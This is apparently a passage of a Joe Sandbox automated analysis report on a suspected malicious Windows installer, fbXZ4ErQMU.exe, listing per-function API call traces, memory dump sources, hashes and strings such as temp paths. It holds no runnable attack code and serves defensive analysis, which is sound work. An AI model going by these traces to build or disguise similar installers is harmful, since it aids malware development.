                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                          • DeleteObject.GDI32(00000110), ref: 00404C81
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                          • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                          • ShowWindow.USER32(?,00000000), ref: 00405169
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                          • ShowWindow.USER32(00000000), ref: 0040517B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $/!s$M$N
                                                          • API String ID: 2564846305-1697469587
                                                          • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                          • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                          • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                          • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                          Function 00403CA7 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                          • ShowWindow.USER32(?), ref: 00403D00
                                                          • DestroyWindow.USER32 ref: 00403D14
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                          • GetDlgItem.USER32(?,?), ref: 00403D51
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                          • EnableWindow.USER32(?,?), ref: 00403F68
                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                          • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                          • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                          • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                          • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                          • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                          Function 004042E6 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                          • GetSysColor.USER32(?), ref: 004043B4
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                          • lstrlenA.KERNEL32(?), ref: 004043D5
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                          • SendMessageA.USER32(00000000), ref: 0040445E
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                          • SetCursor.USER32(00000000), ref: 004044E1
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                          • SetCursor.USER32(00000000), ref: 004044FA
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: /!s$Call$N
                                                          • API String ID: 3103080414-2891250886
                                                          • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                          • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,hyaenic Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$hyaenic Setup
                                                          • API String ID: 941294808-1687442416
                                                          • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                          • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                          Function 00405D66 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                          • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                          • wsprintfA.USER32 ref: 00405DDB
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                          • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %s=%s$[Rename]
                                                          • API String ID: 2171350718-1727408572
                                                          • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                          • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                          • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                          • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                          Function 004063D2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                          • CharPrevA.USER32(?,?,75A53410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          Strings
                                                          • *?|<>/":, xrefs: 0040641A
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                          • "C:\Users\user\Desktop\fbXZ4ErQMU.exe", xrefs: 0040640E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3900762807
                                                          • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                          • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                          • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                          Function 004041E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                          • GetSysColor.USER32(00000000), ref: 0040423D
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                          • SetBkMode.GDI32(?,?), ref: 00404255
                                                          • GetSysColor.USER32(?), ref: 00404268
                                                          • SetBkColor.GDI32(?,?), ref: 00404278
                                                          • DeleteObject.GDI32(?), ref: 00404292
                                                          • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                          • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                          Function 700524D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 70051215: GlobalAlloc.KERNEL32(00000040,70051233,?,700512CF,-7005404B,700511AB,-000000A0), ref: 7005121D
                                                          • GlobalFree.KERNEL32(?), ref: 700525DE
                                                          • GlobalFree.KERNEL32(00000000), ref: 70052618
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53321356153.0000000070051000.00000020.00000001.01000000.00000005.sdmp, Offset: 70050000, based on PE: true
                                                          • Associated: 00000000.00000002.53321293003.0000000070050000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321420725.0000000070053000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000000.00000002.53321477933.0000000070055000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_70050000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 496f8b1c1bc1b0be3293edc5831d9b5d8ff0147752cc62c5b5197a7966487781
                                                          • Instruction ID: 4b3552b7f0b4c4462736b99a94dacb5ba4e3fd9a31d6da382e35c4176e9e811e
                                                          • Opcode Fuzzy Hash: 496f8b1c1bc1b0be3293edc5831d9b5d8ff0147752cc62c5b5197a7966487781
                                                          • Instruction Fuzzy Hash: 9D41AE72104600EFE7168F65CCA8D6E77BAEF86A34B20452DF642D6260E731AD08DB61
                                                          Function 0040521E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,75A523A0), ref: 0040527A
                                                          • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                          • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                          • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                          • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                          Function 00404ACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                          • GetMessagePos.USER32 ref: 00404AF1
                                                          • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                          Function 00402DBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
